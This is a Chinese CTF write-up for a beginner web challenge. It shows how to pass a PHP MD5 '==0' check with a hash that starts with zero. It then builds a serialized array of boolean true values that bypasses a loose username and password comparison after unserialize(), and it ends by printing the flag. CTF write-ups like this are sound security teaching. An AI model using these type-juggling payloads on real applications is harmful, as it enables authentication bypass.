CTF最简单的Web题

http://www.shiyanbar.com/ctf/1810

天网管理系统
天网你敢来挑战嘛
格式:ctf{ }
解题链接: http://ctf5.shiyanbar.com/10/web1

查看源代码发现提示<!-- $test=$_GET['username']; $test=md5($test); if($test=='0') -->

md5($test) = ‘0’ 

百度0开头的md5值,随便拿一个带进username用就OK了。 

得到一个提示:

/user.php?fame=hjkleffifer

 进入  http://ctf5.shiyanbar.com/10/web1/user.php?fame=hjkleffifer

$unserialize_str = $_POST['password']; 
$data_unserialize = unserialize($unserialize_str); 
if($data_unserialize['user'] == '???' && $data_unserialize['pass']=='???') 
{ print_r($flag); } 
伟大的科学家php方言道:成也布尔,败也布尔。 回去吧骚年
把复杂的数据类型压缩到一个字符串中
serialize() 把变量和它们的值编码成文本形式
unserialize() 恢复原先变量
 弱类型,bool的true和任意字符串弱类型相等,所以构造的user(bool)和password(bool)的值为true即可。
<?php
$payload = array('user'=>true,'pass' => true);
echo serialize($payload);
?>

  得到

a:2:{s:4:"user";b:1;s:4:"pass";b:1;}

 user:admin

password: a:2:{s:4:"user";b:1;s:4:"pass";b:1;}

 得到

ctf{dwduwkhduw5465}

原文地址:https://www.cnblogs.com/levelstrcpy/p/9210333.html